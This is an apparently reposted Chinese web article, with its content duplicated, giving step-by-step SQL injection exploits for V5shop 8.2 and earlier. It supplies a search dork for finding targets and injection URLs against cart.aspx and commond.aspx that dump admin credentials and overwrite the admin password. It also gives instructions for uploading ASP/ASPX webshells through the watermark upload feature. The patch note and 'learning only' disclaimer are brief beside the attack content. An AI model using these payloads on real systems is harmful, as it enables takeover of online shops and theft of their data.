V5shop 8.2版本下通杀注入漏洞
来源:互联网 发布:方维拼团源码下载 编辑:程序博客网 时间:2024/06/06 05:46
漏洞危害:高危
一、漏洞文件:cart.aspx
搜索关键词:inurl:scoreindex.aspx
exp :
/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
然后针对爆出来的md5密码进行在线解密,如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。(当然很多时候md5解密是没有结果的)此时需要先更新下管理员密码:
update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
其中pass串先将密码转成32位,再转换成大写,再转换成sql16进制(上面串默认密码是v5shop)
完整语句为:
cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
)>0 --
如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。
进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马,然后再上传aspx大马)。
小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。
修复方法:升级最新8.3版,或者临时把cart.aspx改名或做其它方法处理。
二、漏洞文件:commond.aspx
exp:
/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名
/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码
/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
上面这个用于更改管理员密码
如果顺利,管理员密码已经被更改成你指定的密码(此处默认为v5shop),然后就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。
拿shell方法:(未验证)
系统设置->参数设置->后台上传水印.
先传ASP的马..再传ASPX马.
上传后路径:/uploadFile/Picture/*.asp
小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。
修复方法:升级最新8.3版,或者临时把commond.aspx改名或做其它方法处理。
提示:使用系统者可以及时升级,阅读此文者请大家仅用于学习,勿用于非法用途。
cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--
一、漏洞文件:cart.aspx
搜索关键词:inurl:scoreindex.aspx
exp :
/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
然后针对爆出来的md5密码进行在线解密,如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。(当然很多时候md5解密是没有结果的)此时需要先更新下管理员密码:
update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
其中pass串先将密码转成32位,再转换成大写,再转换成sql16进制(上面串默认密码是v5shop)
完整语句为:
cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
)>0 --
如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。
进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马,然后再上传aspx大马)。
小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。
修复方法:升级最新8.3版,或者临时把cart.aspx改名或做其它方法处理。
二、漏洞文件:commond.aspx
exp:
/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名
/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码
/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
上面这个用于更改管理员密码
如果顺利,管理员密码已经被更改成你指定的密码(此处默认为v5shop),然后就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。
拿shell方法:(未验证)
系统设置->参数设置->后台上传水印.
先传ASP的马..再传ASPX马.
上传后路径:/uploadFile/Picture/*.asp
小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。
修复方法:升级最新8.3版,或者临时把commond.aspx改名或做其它方法处理。
提示:使用系统者可以及时升级,阅读此文者请大家仅用于学习,勿用于非法用途。
cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--
- V5shop 8.2版本下通杀注入漏洞
- ThinkPHP最新版本SQL注入漏洞
- ECSHOP全版本注入漏洞分析
- ECSHOP全版本注入漏洞分析
- V5Shop网店系统更新 版本V8.30.0606 RC1
- PHPNuke所有版本EnhancedSearch文件存在注入漏洞
- ecshop 2.6.2 版本的sql注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- Dvbbs 8.2 login_sql注入漏洞探析
- 数据库注入漏洞【续】
- Sql 注入漏洞,注意
- SQL注入漏洞
- sql注入漏洞原理
- 数据库注入漏洞
- SQL 注入漏洞新动向
- dedecms最新注入漏洞
- SQL注入漏洞接触
- C#多线程学习(六) 互斥对象
- 框架转换与存储过程拼接_0830
- 收藏.NET 技术社区
- AspxGridView控件的常用操作
- C# 扩展方法[学习]
- V5shop 8.2版本下通杀注入漏洞
- 配置魔药(medic.pas/c/cpp)
- Qt Plugin简单示例
- WinForm 窗体间传递数据的一些方法[转]
- MO_GLOBAL - EBS R12 中 Multi Org 设计的深入研究
- I Believe I Can Fly
- android之Itent.ACTION_PICK Intent.ACTION_GET_CONTENT妙用
- 理解值与引用[学习]
- JAVA数据流的概述